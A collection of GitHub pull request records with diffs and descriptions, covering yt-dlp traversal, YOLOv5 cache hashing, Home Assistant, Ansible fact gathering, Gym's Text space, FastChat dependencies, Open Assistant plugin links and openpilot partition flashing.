https://api.github.com/repos/langchain-ai/langchain/pulls/18980
2024-03-12T17:11:25Z
2024-03-12T17:22:08Z
2024-03-12T17:22:08Z
2024-03-12T17:24:25Z
340
langchain-ai/langchain
42,956
[utils] `traverse_obj`: Allow unbranching using `all` and `any`
diff --git a/test/test_traversal.py b/test/test_traversal.py index 3b247d0597b..0b2f3fb5dac 100644 --- a/test/test_traversal.py +++ b/test/test_traversal.py @@ -377,3 +377,35 @@ def test_traversal_xml_etree(self): 'special transformations should act on current element' assert traverse_obj(etree, ('country', 0, ..., 'text()', {int_or_none})) == [1, 2008, 141100], \ 'special transformations should act on current element' + + def test_traversal_unbranching(self): + assert traverse_obj(_TEST_DATA, [(100, 1.2), all]) == [100, 1.2], \ + '`all` should give all results as list' + assert traverse_obj(_TEST_DATA, [(100, 1.2), any]) == 100, \ + '`any` should give the first result' + assert traverse_obj(_TEST_DATA, [100, all]) == [100], \ + '`all` should give list if non branching' + assert traverse_obj(_TEST_DATA, [100, any]) == 100, \ + '`any` should give single item if non branching' + assert traverse_obj(_TEST_DATA, [('dict', 'None', 100), all]) == [100], \ + '`all` should filter `None` and empty dict' + assert traverse_obj(_TEST_DATA, [('dict', 'None', 100), any]) == 100, \ + '`any` should filter `None` and empty dict' + assert traverse_obj(_TEST_DATA, [{ + 'all': [('dict', 'None', 100, 1.2), all], + 'any': [('dict', 'None', 100, 1.2), any], + }]) == {'all': [100, 1.2], 'any': 100}, \ + '`all`/`any` should apply to each dict path separately' + assert traverse_obj(_TEST_DATA, [{ + 'all': [('dict', 'None', 100, 1.2), all], + 'any': [('dict', 'None', 100, 1.2), any], + }], get_all=False) == {'all': [100, 1.2], 'any': 100}, \ + '`all`/`any` should apply to dict regardless of `get_all`' + assert traverse_obj(_TEST_DATA, [('dict', 'None', 100, 1.2), all, {float}]) is None, \ + '`all` should reset branching status' + assert traverse_obj(_TEST_DATA, [('dict', 'None', 100, 1.2), any, {float}]) is None, \ + '`any` should reset branching status' + assert traverse_obj(_TEST_DATA, [('dict', 'None', 100, 1.2), all, ..., {float}]) == [1.2], \ + '`all` should allow further branching' + assert traverse_obj(_TEST_DATA, [('dict', 'None', 'urls', 'data'), any, ..., 'index']) == [0, 1], \ + '`any` should allow further branching' diff --git a/yt_dlp/utils/traversal.py b/yt_dlp/utils/traversal.py index 8938f4c7829..926a3d0a139 100644 --- a/yt_dlp/utils/traversal.py +++ b/yt_dlp/utils/traversal.py @@ -228,6 +228,15 @@ def apply_path(start_obj, path, test_type): if not casesense and isinstance(key, str): key = key.casefold() + if key in (any, all): + has_branched = False + filtered_objs = (obj for obj in objs if obj not in (None, {})) + if key is any: + objs = (next(filtered_objs, None),) + else: + objs = (list(filtered_objs),) + continue + if __debug__ and callable(key): # Verify function signature inspect.signature(key).bind(None, None)
**IMPORTANT**: PRs without the template will be CLOSED ### Description of your *pull request* and other information <!-- Explanation of your *pull request* in arbitrary form goes here. Please **make sure the description explains the purpose and effect** of your *pull request* and is worded well enough to be understood. Provide as much **context and examples** as possible --> Allow resetting branch status using `any` and `all` to give a single or all results from the currentl pool. Especially useful in dict traversal. Soft deprecates `get_all`, since `any` and `all` fill the same purpose but inline not global <details open><summary>Template</summary> <!-- OPEN is intentional --> <!-- # PLEASE FOLLOW THE GUIDE BELOW - You will be asked some questions, please read them **carefully** and answer honestly - Put an `x` into all the boxes `[ ]` relevant to your *pull request* (like [x]) - Use *Preview* tab to see how your *pull request* will actually look like --> ### Before submitting a *pull request* make sure you have: - [x] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions) - [x] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests - [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8) and [ran relevant tests](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) ### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check all of the following options that apply: - [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/) ### What is the purpose of your *pull request*? - [x] Core bug fix/improvement </details>
https://api.github.com/repos/yt-dlp/yt-dlp/pulls/9571
2024-03-30T11:15:41Z
2024-03-30T18:54:44Z
2024-03-30T18:54:43Z
2024-03-30T18:54:47Z
934
yt-dlp/yt-dlp
7,354
Updated cache v0.2 with `hashlib`
diff --git a/utils/datasets.py b/utils/datasets.py index 36416b14e13..882c7764c4a 100755 --- a/utils/datasets.py +++ b/utils/datasets.py @@ -1,6 +1,7 @@ # Dataset utils and dataloaders import glob +import hashlib import logging import math import os @@ -36,9 +37,12 @@ break -def get_hash(files): - # Returns a single hash value of a list of files - return sum(os.path.getsize(f) for f in files if os.path.isfile(f)) +def get_hash(paths): + # Returns a single hash value of a list of paths (files or dirs) + size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes + h = hashlib.md5(str(size).encode()) # hash sizes + h.update(''.join(paths).encode()) # hash paths + return h.hexdigest() # return hash def exif_size(img): @@ -383,7 +387,7 @@ def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, r cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache') # cached labels if cache_path.is_file(): cache, exists = torch.load(cache_path), True # load - if cache['hash'] != get_hash(self.label_files + self.img_files) or 'version' not in cache: # changed + if cache['hash'] != get_hash(self.label_files + self.img_files): # changed cache, exists = self.cache_labels(cache_path, prefix), False # re-cache else: cache, exists = self.cache_labels(cache_path, prefix), False # cache @@ -501,9 +505,9 @@ def cache_labels(self, path=Path('./labels.cache'), prefix=''): x['hash'] = get_hash(self.label_files + self.img_files) x['results'] = nf, nm, ne, nc, i + 1 - x['version'] = 0.1 # cache version + x['version'] = 0.2 # cache version try: - torch.save(x, path) # save for next time + torch.save(x, path) # save cache for next time logging.info(f'{prefix}New cache created: {path}') except Exception as e: logging.info(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}') # path not writeable
Possible fix for https://github.com/ultralytics/yolov5/issues/3349 This PR increments the cache file version to 0.2 and uses a new hashlib-based solution which detects changes in dataset contents **and location**, recaching on any changes in either. ## 🛠️ PR Summary <sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)<sub> ### 🌟 Summary Improved dataset hashing for better cache validation. ### 📊 Key Changes - Modified the `get_hash` function to compute hashes based on paths (files or directories) instead of just file sizes. - Hash now includes both the cumulative size and the actual paths of the dataset for a unique identifier. - Removed check for 'version' in cache; now solely relies on the new hashing method to validate the cache. ### 🎯 Purpose & Impact - **Enhanced Accuracy:** The new hashing method provides a more robust way to detect changes in the dataset, reducing the risk of using outdated cache entries. - **Increased Reliability:** The combination of size and path in the hash helps prevent false cache invalidation, ensuring that cache is only rebuilt when necessary. - **User Experience:** Users may observe faster setup times for repeat training sessions due to fewer unnecessary cache rebuilds.
https://api.github.com/repos/ultralytics/yolov5/pulls/3350
2021-05-26T11:31:18Z
2021-05-26T12:26:52Z
2021-05-26T12:26:52Z
2024-01-19T18:08:48Z
594
ultralytics/yolov5
25,367
Update pyTibber to 0.21.7
diff --git a/homeassistant/components/tibber/manifest.json b/homeassistant/components/tibber/manifest.json index b32c74fb5b0c56..2f5927442a2d4c 100644 --- a/homeassistant/components/tibber/manifest.json +++ b/homeassistant/components/tibber/manifest.json @@ -3,7 +3,7 @@ "domain": "tibber", "name": "Tibber", "documentation": "https://www.home-assistant.io/integrations/tibber", - "requirements": ["pyTibber==0.21.6"], + "requirements": ["pyTibber==0.21.7"], "codeowners": ["@danielhiversen"], "quality_scale": "silver", "config_flow": true, diff --git a/requirements_all.txt b/requirements_all.txt index c8986b16a54740..d5ddb1acb69d73 100644 --- a/requirements_all.txt +++ b/requirements_all.txt @@ -1350,7 +1350,7 @@ pyRFXtrx==0.27.0 # pySwitchmate==0.4.6 # homeassistant.components.tibber -pyTibber==0.21.6 +pyTibber==0.21.7 # homeassistant.components.dlink pyW215==0.7.0 diff --git a/requirements_test_all.txt b/requirements_test_all.txt index bbbdd62480943e..915be051b3bc64 100644 --- a/requirements_test_all.txt +++ b/requirements_test_all.txt @@ -836,7 +836,7 @@ pyMetno==0.9.0 pyRFXtrx==0.27.0 # homeassistant.components.tibber -pyTibber==0.21.6 +pyTibber==0.21.7 # homeassistant.components.nextbus py_nextbusnext==0.1.5
Signed-off-by: Daniel Hjelseth Høyer <github@dahoiv.net> <!-- You are amazing! Thanks for contributing to our project! Please, DO NOT DELETE ANY TEXT from this template! (unless instructed). --> ## Breaking change <!-- If your PR contains a breaking change for existing users, it is important to tell them what breaks, how to make it work again and why we did this. This piece of text is published with the release notes, so it helps if you write it towards our users, not us. Note: Remove this section if this PR is NOT a breaking change. --> ## Proposed change <!-- Describe the big picture of your changes here to communicate to the maintainers why we should accept this pull request. If it fixes a bug or resolves a feature request, be sure to link to that issue in the additional information section. --> Update tibber lib https://github.com/Danielhiversen/pyTibber/compare/0.21.6...0.21.7 ## Type of change <!-- What type of change does your PR introduce to Home Assistant? NOTE: Please, check only 1! box! If your PR requires multiple boxes to be checked, you'll most likely need to split it into multiple PRs. This makes things easier and faster to code review. --> - [x] Dependency upgrade - [ ] Bugfix (non-breaking change which fixes an issue) - [ ] New integration (thank you!) - [ ] New feature (which adds functionality to an existing integration) - [ ] Breaking change (fix/feature causing existing functionality to break) - [ ] Code quality improvements to existing code or addition of tests ## Additional information <!-- Details are important, and help maintainers processing your PR. Please be sure to fill out additional details, if applicable. --> - This PR fixes or closes issue: fixes # - This PR is related to issue: - Link to documentation pull request: ## Checklist <!-- Put an `x` in the boxes that apply. You can also fill these out after creating the PR. If you're unsure about any of them, don't hesitate to ask. We're here to help! This is simply a reminder of what we are going to look for before merging your code. --> - [x] The code change is tested and works locally. - [x] Local tests pass. **Your PR cannot be merged unless tests pass** - [x] There is no commented out code in this PR. - [x] I have followed the [development checklist][dev-checklist] - [x] The code has been formatted using Black (`black --fast homeassistant tests`) - [ ] Tests have been added to verify that the new code works. If user exposed functionality or configuration variables are added/changed: - [ ] Documentation added/updated for [www.home-assistant.io][docs-repository] If the code communicates with devices, web services, or third-party tools: - [ ] The [manifest file][manifest-docs] has all fields filled out correctly. Updated and included derived files by running: `python3 -m script.hassfest`. - [ ] New or updated dependencies have been added to `requirements_all.txt`. Updated by running `python3 -m script.gen_requirements_all`. - [ ] For the updated dependencies - a link to the changelog, or at minimum a diff between library versions is added to the PR description. - [ ] Untested files have been added to `.coveragerc`. The integration reached or maintains the following [Integration Quality Scale][quality-scale]: <!-- The Integration Quality Scale scores an integration on the code quality and user experience. Each level of the quality scale consists of a list of requirements. We highly recommend getting your integration scored! --> - [ ] No score or internal - [ ] 🥈 Silver - [ ] 🥇 Gold - [ ] 🏆 Platinum <!-- This project is very active and we have a high turnover of pull requests. Unfortunately, the number of incoming pull requests is higher than what our reviewers can review and merge so there is a long backlog of pull requests waiting for review. You can help here! By reviewing another pull request, you will help raise the code quality of that pull request and the final review will be faster. This way the general pace of pull request reviews will go up and your wait time will go down. When picking a pull request to review, try to choose one that hasn't yet been reviewed. Thanks for helping out! --> To help with the load of incoming pull requests: - [ ] I have reviewed two other [open pull requests][prs] in this repository. [prs]: https://github.com/home-assistant/core/pulls?q=is%3Aopen+is%3Apr+-author%3A%40me+-draft%3Atrue+-label%3Awaiting-for-upstream+sort%3Acreated-desc+review%3Anone+-status%3Afailure <!-- Thank you for contributing <3 Below, some useful links you could explore: --> [dev-checklist]: https://developers.home-assistant.io/docs/en/development_checklist.html [manifest-docs]: https://developers.home-assistant.io/docs/en/creating_integration_manifest.html [quality-scale]: https://developers.home-assistant.io/docs/en/next/integration_quality_scale_index.html [docs-repository]: https://github.com/home-assistant/home-assistant.io
https://api.github.com/repos/home-assistant/core/pulls/63663
2022-01-08T10:59:11Z
2022-01-08T11:56:33Z
2022-01-08T11:56:33Z
2022-01-09T12:01:51Z
450
home-assistant/core
39,376
Fix gathering facts in run_once play
diff --git a/lib/ansible/executor/play_iterator.py b/lib/ansible/executor/play_iterator.py index faa54254623777..aaaa59697ba82e 100644 --- a/lib/ansible/executor/play_iterator.py +++ b/lib/ansible/executor/play_iterator.py @@ -169,6 +169,9 @@ def __init__(self, inventory, play, play_context, variable_manager, all_vars, st fact_path = self._play.fact_path setup_block = Block(play=self._play) + # Gathering facts with run_once would copy the facts from one host to + # the others. + setup_block.run_once = False setup_task = Task(block=setup_block) setup_task.action = 'setup' setup_task.name = 'Gathering Facts' diff --git a/test/integration/targets/gathering_facts/runme.sh b/test/integration/targets/gathering_facts/runme.sh index e4c7b3844a19b9..4baf8379e35bce 100755 --- a/test/integration/targets/gathering_facts/runme.sh +++ b/test/integration/targets/gathering_facts/runme.sh @@ -5,3 +5,5 @@ set -eux # ANSIBLE_CACHE_PLUGINS=cache_plugins/ ANSIBLE_CACHE_PLUGIN=none ansible-playbook test_gathering_facts.yml -i ../../inventory -v "$@" ansible-playbook test_gathering_facts.yml -i ../../inventory -v "$@" #ANSIBLE_CACHE_PLUGIN=base ansible-playbook test_gathering_facts.yml -i ../../inventory -v "$@" + +ANSIBLE_GATHERING=smart ansible-playbook test_run_once.yml -i ../../inventory -v "$@" diff --git a/test/integration/targets/gathering_facts/test_run_once.yml b/test/integration/targets/gathering_facts/test_run_once.yml new file mode 100644 index 00000000000000..88ea155ddd29ee --- /dev/null +++ b/test/integration/targets/gathering_facts/test_run_once.yml @@ -0,0 +1,28 @@ +--- +- hosts: facthost1 + gather_facts: no + tasks: + - name: install test local facts + copy: + src: uuid.fact + dest: /etc/ansible/facts.d/ + mode: 0755 + +- hosts: facthost1,facthost2 + gather_facts: yes + run_once: yes + tasks: + - block: + - name: 'Check the same host is used' + assert: + that: 'hostvars.facthost1.ansible_fqdn == hostvars.facthost2.ansible_fqdn' + msg: 'This test requires 2 inventory hosts referring to the same host.' + - name: "Check that run_once doesn't prevent fact gathering (#39453)" + assert: + that: 'hostvars.facthost1.ansible_local.uuid != hostvars.facthost2.ansible_local.uuid' + msg: "{{ 'Same value for ansible_local.uuid on both hosts: ' ~ hostvars.facthost1.ansible_local.uuid }}" + always: + - name: remove test local facts + file: + path: /etc/ansible/facts.d/uuid.fact + state: absent diff --git a/test/integration/targets/gathering_facts/uuid.fact b/test/integration/targets/gathering_facts/uuid.fact new file mode 100644 index 00000000000000..79e3f62677ec81 --- /dev/null +++ b/test/integration/targets/gathering_facts/uuid.fact @@ -0,0 +1,10 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- + + +import json +import uuid + + +# return a random string +print(json.dumps(str(uuid.uuid4())))
##### SUMMARY When facts have to be gathered in a play with run_once==True, the facts are gathered on only one host and copied to the others. This may cause facts such as `ansible_fqdn` to be the same on all the hosts. <!--- If you are fixing an existing issue, please include "Fixes #nnn" in your commit message and your description; but you should still explain what the change does.--> Fixes #39312 ##### ISSUE TYPE - Bugfix Pull Request ##### COMPONENT NAME lib/ansible/executor/play_iterator.py ##### ANSIBLE VERSION <!--- Paste verbatim output from "ansible --version" between quotes below --> ``` ansible 2.6.0 (devel c8a9b411bc) last updated 2018/04/27 22:35:51 (GMT +200) config file = /etc/ansible/ansible.cfg configured module search path = ['/home/kael/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules'] ansible python module location = /home/kael/dev/ansible/lib/ansible executable location = /home/kael/dev/ansible/venv/bin/ansible python version = 3.6.5rc1 (default, Mar 14 2018, 06:54:23) [GCC 7.3.0] ``` ##### ADDITIONAL INFORMATION <!--- Include additional information to help people understand the change here. For bugs that don't have a linked bug report, a step-by-step reproduction of the problem is helpful. --> <!--- Paste verbatim command output below, e.g. before and after your change -->
https://api.github.com/repos/ansible/ansible/pulls/39453
2018-04-27T20:40:53Z
2018-05-04T19:33:33Z
2018-05-04T19:33:33Z
2019-05-07T16:39:30Z
873
ansible/ansible
49,039
Text space
diff --git a/gym/spaces/__init__.py b/gym/spaces/__init__.py index 1a872285d6f..833e0818c2f 100644 --- a/gym/spaces/__init__.py +++ b/gym/spaces/__init__.py @@ -15,6 +15,7 @@ from gym.spaces.multi_binary import MultiBinary from gym.spaces.multi_discrete import MultiDiscrete from gym.spaces.space import Space +from gym.spaces.text import Text from gym.spaces.tuple import Tuple from gym.spaces.utils import flatdim, flatten, flatten_space, unflatten @@ -22,6 +23,7 @@ "Space", "Box", "Discrete", + "Text", "Graph", "GraphInstance", "MultiDiscrete", diff --git a/gym/spaces/text.py b/gym/spaces/text.py new file mode 100644 index 00000000000..416d3e71790 --- /dev/null +++ b/gym/spaces/text.py @@ -0,0 +1,123 @@ +"""Implementation of a space that represents textual strings.""" +from typing import Any, FrozenSet, List, Optional, Set, Tuple, Union + +import numpy as np + +from gym.spaces.space import Space +from gym.utils import seeding + +alphanumeric: FrozenSet[str] = frozenset( + "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" +) + + +class Text(Space[str]): + r"""A space representing a string comprised of characters from a given charset. + + Example:: + >>> # {"", "B5", "hello", ...} + >>> Text(5) + >>> # {"0", "42", "0123456789", ...} + >>> import string + >>> Text(min_length = 1, + ... max_length = 10, + ... charset = string.digits) + """ + + def __init__( + self, + max_length: int, + *, + min_length: int = 0, + charset: Union[Set[str], str] = alphanumeric, + seed: Optional[Union[int, seeding.RandomNumberGenerator]] = None, + ): + r"""Constructor of :class:`Text` space. + + Both bounds for text length are inclusive. + + Args: + min_length (int): Minimum text length (in characters). + max_length (int): Maximum text length (in characters). + charset (Union[set, SupportsIndex]): Character set, defaults to the lower and upper english alphabet plus latin digits. + seed: The seed for sampling from the space. + """ + assert np.issubdtype( + type(min_length), np.integer + ), f"Expects the min_length to be an integer, actual type: {type(min_length)}" + assert np.issubdtype( + type(max_length), np.integer + ), f"Expects the max_length to be an integer, actual type: {type(max_length)}" + assert ( + 0 <= min_length + ), f"Minimum text length must be non-negative, actual value: {min_length}" + assert ( + min_length <= max_length + ), f"The min_length must be less than or equal to the max_length, min_length: {min_length}, max_length: {max_length}" + + self.min_length: int = int(min_length) + self.max_length: int = int(max_length) + self.charset: FrozenSet[str] = frozenset(charset) + self._charlist: List[str] = list(charset) + self._charset_str: str = "".join(sorted(self._charlist)) + + # As the shape is dynamic (between min_length and max_length) then None + super().__init__(dtype=str, seed=seed) + + def sample( + self, mask: Optional[Tuple[Optional[int], Optional[np.ndarray]]] = None + ) -> str: + """Generates a single random sample from this space with by default a random length between `min_length` and `max_length` and sampled from the `charset`. + + Args: + mask: An optional tuples of length and mask for the text. + The length is expected to be between the `min_length` and `max_length` otherwise a random integer between `min_length` and `max_length` is selected. + For the mask, we expect a numpy array of length of the charset passed with dtype == np.int8 + + Returns: + A sampled string from the space + """ + if mask is not None: + length, charlist_mask = mask + if length is not None: + assert self.min_length <= length <= self.max_length + + if charlist_mask is not None: + assert isinstance(charlist_mask, np.ndarray) + assert charlist_mask.dtype is np.int8 + assert charlist_mask.shape == (len(self._charlist),) + else: + length, charlist_mask = None, None + + if length is None: + length = self.np_random.randint(self.min_length, self.max_length + 1) + + if charlist_mask is None: + string = self.np_random.choice(self._charlist, size=length) + else: + masked_charlist = self._charlist[np.where(mask)[0]] + string = self.np_random.choice(masked_charlist, size=length) + + return "".join(string) + + def contains(self, x: Any) -> bool: + """Return boolean specifying if x is a valid member of this space.""" + if isinstance(x, str): + if self.min_length <= len(x) <= self.max_length: + return all(c in self.charset for c in x) + return False + + def __repr__(self) -> str: + """Gives a string representation of this space.""" + return ( + f"Text({self.min_length}, {self.max_length}, charset={self._charset_str})" + ) + + def __eq__(self, other) -> bool: + """Check whether ``other`` is equivalent to this instance.""" + return ( + isinstance(other, Text) + and self.min_length == other.min_length + and self.max_length == other.max_length + and self.charset == other.charset + ) diff --git a/gym/version.py b/gym/version.py index 21d74bdf3c5..1ae872fda0d 100644 --- a/gym/version.py +++ b/gym/version.py @@ -1 +1 @@ -VERSION = "0.24.1" +VERSION = "0.25.0" diff --git a/tests/spaces/test_spaces.py b/tests/spaces/test_spaces.py index b998c8362d5..b58ab6c792c 100644 --- a/tests/spaces/test_spaces.py +++ b/tests/spaces/test_spaces.py @@ -1,14 +1,24 @@ import copy import json # note: ujson fails this test due to float equality import pickle +import string import tempfile from typing import List, Union import numpy as np import pytest -from gym import Space -from gym.spaces import Box, Dict, Discrete, Graph, MultiBinary, MultiDiscrete, Tuple +from gym.spaces import ( + Box, + Dict, + Discrete, + Graph, + MultiBinary, + MultiDiscrete, + Space, + Text, + Tuple, +) @pytest.mark.parametrize( @@ -45,6 +55,8 @@ Graph(node_space=Box(low=-100, high=100, shape=(3, 4)), edge_space=Discrete(5)), Graph(node_space=Discrete(5), edge_space=Box(low=-100, high=100, shape=(3, 4))), Graph(node_space=Discrete(5), edge_space=None), + Text(5), + Text(min_length=1, max_length=10, charset=string.digits), ], ) def test_roundtripping(space): @@ -102,6 +114,8 @@ def test_roundtripping(space): Graph(node_space=Box(low=-100, high=100, shape=(3, 4)), edge_space=Discrete(5)), Graph(node_space=Discrete(5), edge_space=Box(low=-100, high=100, shape=(3, 4))), Graph(node_space=Discrete(5), edge_space=None), + Text(5), + Text(min_length=1, max_length=10, charset=string.digits), ], ) def test_equality(space): @@ -144,6 +158,10 @@ def test_equality(space): ), Graph(node_space=Discrete(5), edge_space=None), ), + ( + Text(5), + Text(min_length=1, max_length=10, charset=string.digits), + ), ], ) def test_inequality(spaces): @@ -466,6 +484,10 @@ def test_composite_space_sample_mask(space, mask): ), Graph(node_space=Discrete(5), edge_space=None), ), + ( + Text(5), + Text(min_length=1, max_length=10, charset=string.digits), + ), ], ) def test_class_inequality(spaces): @@ -584,6 +606,8 @@ def test_box_dtype_check(): Graph(node_space=Discrete(5), edge_space=Box(low=-100, high=100, shape=(3, 4))), Graph(node_space=Box(low=-100, high=100, shape=(3, 4)), edge_space=None), Graph(node_space=Discrete(5), edge_space=None), + Text(5), + Text(min_length=1, max_length=10, charset=string.digits), ], ) def test_seed_returns_list(space): @@ -647,6 +671,8 @@ def sample_equal(sample1, sample2): Graph(node_space=Discrete(5), edge_space=Box(low=-100, high=100, shape=(3, 4))), Graph(node_space=Box(low=-100, high=100, shape=(3, 4)), edge_space=None), Graph(node_space=Discrete(5), edge_space=None), + Text(5), + Text(min_length=1, max_length=10, charset=string.digits), ], ) def test_seed_reproducibility(space): @@ -691,6 +717,8 @@ def test_seed_reproducibility(space): Graph(node_space=Discrete(5), edge_space=Box(low=-100, high=100, shape=(3, 4))), Graph(node_space=Box(low=-100, high=100, shape=(3, 4)), edge_space=None), Graph(node_space=Discrete(5), edge_space=None), + Text(5), + Text(min_length=1, max_length=10, charset=string.digits), ], ) def test_seed_subspace_incorrelated(space): @@ -958,6 +986,8 @@ def test_box_legacy_state_pickling(): Graph(node_space=Discrete(5), edge_space=Box(low=-100, high=100, shape=(3, 4))), Graph(node_space=Box(low=-100, high=100, shape=(3, 4)), edge_space=None), Graph(node_space=Discrete(5), edge_space=None), + Text(5), + Text(min_length=1, max_length=10, charset=string.digits), ], ) def test_pickle(space):
A completion of https://github.com/openai/gym/pull/2908 to allow it to be merged for `v0.25.0`. For the complete details of the Text see the above PR. This PR adds masking to that PR with an optional tuples for the space text length that is optional and a mask a similar specification to the other space's masks.
https://api.github.com/repos/openai/gym/pulls/2959
2022-07-11T13:05:13Z
2022-07-11T15:39:05Z
2022-07-11T15:39:05Z
2022-07-11T15:39:05Z
2,585
openai/gym
5,583
Fix dependencies and styles
diff --git a/fastchat/llm_judge/README.md b/fastchat/llm_judge/README.md index 1ab0fdc9d2..b9f06820bf 100644 --- a/fastchat/llm_judge/README.md +++ b/fastchat/llm_judge/README.md @@ -16,7 +16,7 @@ To automate the evaluation process, we prompt strong LLMs like GPT-4 to act as j ``` git clone https://github.com/lm-sys/FastChat.git cd FastChat -pip install -e ".[llm_judge]" +pip install -e ".[model_worker,llm_judge]" ``` ## Review Pre-Generated Model Answers and Judgments diff --git a/fastchat/model/model_falcon.py b/fastchat/model/model_falcon.py index 740f6ef5bb..20afc4f0fb 100644 --- a/fastchat/model/model_falcon.py +++ b/fastchat/model/model_falcon.py @@ -8,8 +8,6 @@ from fastchat.utils import is_partial_stop -transformers.logging.set_verbosity_error() - @torch.inference_mode() def generate_stream_falcon( diff --git a/fastchat/train/llama_flash_attn_monkey_patch.py b/fastchat/train/llama_flash_attn_monkey_patch.py index 89f1913d97..5f9971a32e 100644 --- a/fastchat/train/llama_flash_attn_monkey_patch.py +++ b/fastchat/train/llama_flash_attn_monkey_patch.py @@ -1,26 +1,14 @@ from typing import List, Optional, Tuple -import logging +import warnings import torch from torch import nn -import warnings import transformers from transformers.models.llama.modeling_llama import apply_rotary_pos_emb -try: - from flash_attn.flash_attn_interface import flash_attn_varlen_qkvpacked_func - from flash_attn.bert_padding import unpad_input, pad_input -except Exception: - raise ModuleNotFoundError( - "Please install FlashAttention first, e.g., with pip install flash-attn --no-build-isolation, Learn more at https://github.com/Dao-AILab/flash-attention#installation-and-features" - ) - -try: - from einops import rearrange -except Exception: - raise ModuleNotFoundError( - "Please install einops first, e.g., with pip install einops" - ) +from einops import rearrange +from flash_attn.flash_attn_interface import flash_attn_varlen_qkvpacked_func +from flash_attn.bert_padding import unpad_input, pad_input # ADAPTED from https://github.com/allenai/open-instruct/blob/main/open_instruct/llama_flash_attn_monkey_patch.py @@ -135,7 +123,7 @@ def _prepare_decoder_attention_mask( def replace_llama_attn_with_flash_attn(): cuda_major, cuda_minor = torch.cuda.get_device_capability() if cuda_major < 8: - logging.warning( + warnings.warn( "Flash attention is only supported on A100 or H100 GPU during training due to head dim > 64 backward." "ref: https://github.com/HazyResearch/flash-attention/issues/190#issuecomment-1523359593" ) diff --git a/pyproject.toml b/pyproject.toml index 86fb5cd315..86ff61b85a 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -13,15 +13,15 @@ classifiers = [ "License :: OSI Approved :: Apache Software License", ] dependencies = [ - "einops", "fastapi", "httpx", "markdown2[all]", "nh3", "numpy", - "peft", "prompt_toolkit>=3.0.0", "pydantic<2,>=1", "requests", "rich>=10.0.0", + "fastapi", "httpx", "markdown2[all]", "nh3", "numpy", + "prompt_toolkit>=3.0.0", "pydantic<2,>=1", "requests", "rich>=10.0.0", "shortuuid", "tiktoken", "uvicorn", "wandb" ] [project.optional-dependencies] -model_worker = ["accelerate>=0.21", "torch", "transformers>=4.31.0"] +model_worker = ["accelerate>=0.21", "peft", "sentencepiece", "torch", "transformers>=4.31.0"] webui = ["gradio"] -train = ["flash-attn>=2.0"] +train = ["einops", "flash-attn>=2.0"] llm_judge = ["openai", "anthropic>=0.3", "ray"] dev = ["black==23.3.0", "pylint==2.8.2"]
https://api.github.com/repos/lm-sys/FastChat/pulls/2184
2023-08-08T14:14:03Z
2023-08-08T14:48:25Z
2023-08-08T14:48:25Z
2023-08-08T14:52:27Z
1,095
lm-sys/FastChat
41,244
Point plugin links to prod
diff --git a/docs/docs/plugins/list.md b/docs/docs/plugins/list.md index b304ddf239..e822f9d205 100644 --- a/docs/docs/plugins/list.md +++ b/docs/docs/plugins/list.md @@ -16,7 +16,7 @@ Default Plugins shipped, supported and hosted by Open Assistant. ### Web Retriever - url: - https://inference.dev.open-assistant.io/plugins/web_retriever/ai-plugin.json + https://inference.prod.open-assistant.io/plugins/web_retriever/ai-plugin.json - info: https://github.com/LAION-AI/Open-Assistant/tree/main/inference/server/oasst_inference_server/plugins/web_retriever @@ -46,7 +46,7 @@ What is the capital of (France)? ### Super Aligned GAGLETO - url: - https://inference.dev.open-assistant.io/plugins/gale_pleaser/ai-plugin.json + https://inference.prod.open-assistant.io/plugins/gale_pleaser/ai-plugin.json - info: https://github.com/LAION-AI/Open-Assistant/tree/main/inference/server/oasst_inference_server/plugins/gale_pleaser
https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/3386
2023-06-11T15:12:51Z
2023-06-12T04:55:33Z
2023-06-12T04:55:33Z
2023-06-12T04:55:34Z
262
LAION-AI/Open-Assistant
37,248
don't reflash agnos update if already flashed
diff --git a/selfdrive/hardware/tici/agnos.py b/selfdrive/hardware/tici/agnos.py index 24e544f23b8539..c0de8d4765913d 100755 --- a/selfdrive/hardware/tici/agnos.py +++ b/selfdrive/hardware/tici/agnos.py @@ -80,8 +80,15 @@ def flash_partition(cloudlog, spinner, target_slot, partition): cloudlog.info(f"Downloading and writing {partition['name']}") downloader = StreamingDecompressor(partition['url']) - with open(f"/dev/disk/by-partlabel/{partition['name']}{target_slot}", 'wb') as out: + with open(f"/dev/disk/by-partlabel/{partition['name']}{target_slot}", 'wb+') as out: partition_size = partition['size'] + + # Check if partition is already flashed + out.seek(partition_size) + if out.read(64) == partition['hash_raw'].lower().encode(): + cloudlog.info(f"Already flashed {partition['name']}") + return + # Clear hash before flashing out.seek(partition_size) out.write(b"\x00" * 64)
https://api.github.com/repos/commaai/openpilot/pulls/19944
2021-01-27T23:56:18Z
2021-01-28T01:10:55Z
2021-01-28T01:10:55Z
2021-01-28T01:10:56Z
274
commaai/openpilot
9,349
[cherry-pick #1920]
